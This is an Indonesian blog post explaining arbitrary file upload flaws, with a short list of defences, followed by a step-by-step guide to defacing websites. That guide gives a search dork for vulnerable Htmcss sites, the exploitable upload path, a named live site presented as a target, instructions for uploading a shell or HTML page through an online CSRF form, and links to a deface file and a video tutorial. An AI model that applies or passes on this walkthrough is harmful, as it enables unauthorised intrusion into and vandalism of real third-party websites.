Cara Deface Website dengan Metode Arbitary File Upload
Assalamulaikum , Salam semua bagi pengunjung website saya
2 Juli 2022
sebelumnya apa sih File Upload Vulnerability ?
yaaa.... sesuai dengan namanya, file upload arbitary adalah suatu kerentanan dimana sebuah peretas/attacker menitipkan/mengupload file ke dalam web tanpa adanya validasi seperti nama , jenis, kontent dan ukurannya.
oke di blog ini materi yang kita bahas adalah file upload vuln dengan metode htmcss
yang pertama kalian lakukan adalah dorking. oh iya, jenis deface ini untuk risk/resiko yang didapat pada sebuah website adalah Medium-Critical
jika sebuah bug memiliki tingkat resiko medium-critical , bisa dipastikan sangat berbahaya
BAGAIMANA CARA MELINDUNGINYA ?
1. Pisahkan Unggahan Kamu, anda bisa memanfaatkan penyimpanan cloud guna
untuk memindahkan/memisahkan file unggahan kamu kedalam penyimpanan awan,
tau jika kamu jago backend untuk website, kamu bisa menulis unggahan file
kedalam databases kamu
2. Pastikan File unggah tidak dapat di eksekusi, dalam kasus ini, file yang kita unggah akan ditulis di disk file system operasi website kita, pastikan file tersebut tidak dapat diketahui oleh system operasi tersebut untuk melakukan/execute nya. proses web server kamu sepatutnya mempunyai izin baca dan menulis pada direktori yang digunakan untuk menaro konten yang diupload/unggah
3. Ganti nama file yang Diunggah, sebagai developer website, sebaiknya kita harus mengelabui file yang diupload guna mempersuli attack untuk mengeksekusi file yang berbahaya
4. Validasi Ekstensi format web dan validasi content type header, ekstensi sendiri adalah jenis format pada file, file yang diunggah pada web akan masuk ke dalam Content-Type header, cantumkan beberapa ekstensi yang menurut kalian baik, seperti pdf, docx, jpg, dll. dan blacklist ektensi file seperti html, php5, php, dll. lakukan ini di sisi server, sebab di sisi client dapat dielakkan. Perhatikan kalau skrip ataupun proxy sederhana bisa memalsukan tipe file, jadi proteksi ini meskipun berguna, walaupun tidak cukup berguna bagi hacker/peretas yang jago
5. Gunakan pemindai virus/ scan virus, kita harus melakukan pengecekan virus secara berkala, pemindai virus sangatlah mahir dalam hal mengelai file yang berbahaya yang menyamar selaku file.
6. Cek Ukuran file dan bersihkan nama file, metode mengatur ukuran file sangatlah murah dan gampang guna melaksanakan serbuan penolakan layanan dalam menggunggah/menerima file yang ukuran nya besar. Dan membersihkan nama file yang panjang jugalah sangat berguna guna untuk melindugi eksploitasi buffer overflow guna menghindari karakter spesial yang dapat menimbulkan perilaku aneh
7. Hati-hati dengan file yang terkompresi, bila web kamu menerima jenis file yang dikompresi seperti zip, dan lain lain, harap berhati hati, bisa jadi file yang diunggah di kompresi memiliki kode yang berbahaya atau bisa menyebabkan sistem mogok ataupun membuat system yang membacanya tidak berguna. Bom zip dibuat untuk membongkar file dalam waktu yang lama dan memenuhi ruang disk. biasanya zip akan tumbuh menjadi ukuran file yang besar dikala dibongkar.
---------------------------
detail :
bug = htmcss (file upload arbitary)
risk = Medium-Critical
local = no
remote/shell = yes
dork : intext:"Htmcss.com All Rights Reserved"
sudah di test di : Android, Windows, Kali Linux
exploit : /tpl/plugins/upload9.1.0/server/php/
cara deface =
1. kalian harus dorking, dan saya sudah menemukan websitenya yang vuln
http://www.xmgbuy.com/usershow/csw8956
2. kalian ganti jadi exploit seperti ini
http://www.xmgbuy.com/tpl/plugins/upload9.1.0/server/php/
jika seperti ini, artinya vuln, bisa di retas
3. kalian cari csrf online di google, untuk csrf saya memakai ini
pada bagian csrf, taro link exploit pada kolom target, dan untuk postfile pilih files[]
lalu setelah itu lock target, dan masukan file shell kalian setelah kalian pencet lock target
disini saya mau taro file html
setelah itu pencet upload , ketika ada notif, pencet lanjutkan/continue
4. jika sudah pencet upload, maka akan muncul seperti ini
pada kasus ini, kalian ambil pada bagian url html =
http:\/\/www.xmgbuy.com\/tpl\/plugins\/upload9.1.0\/server\/php\/files\/\/1656766698_.html
5. setelah itu salin link nya dan tempel ke browser, boom berhasil
jika kalian mau file htmlnya silahkan ke sini
https://pastebin.com/raw/bYbF1Kup
cukup sekian dan terimakasih
tutor yt : https://www.youtube.com/watch?v=dpFGbP46X-4
=========================================================
================================================================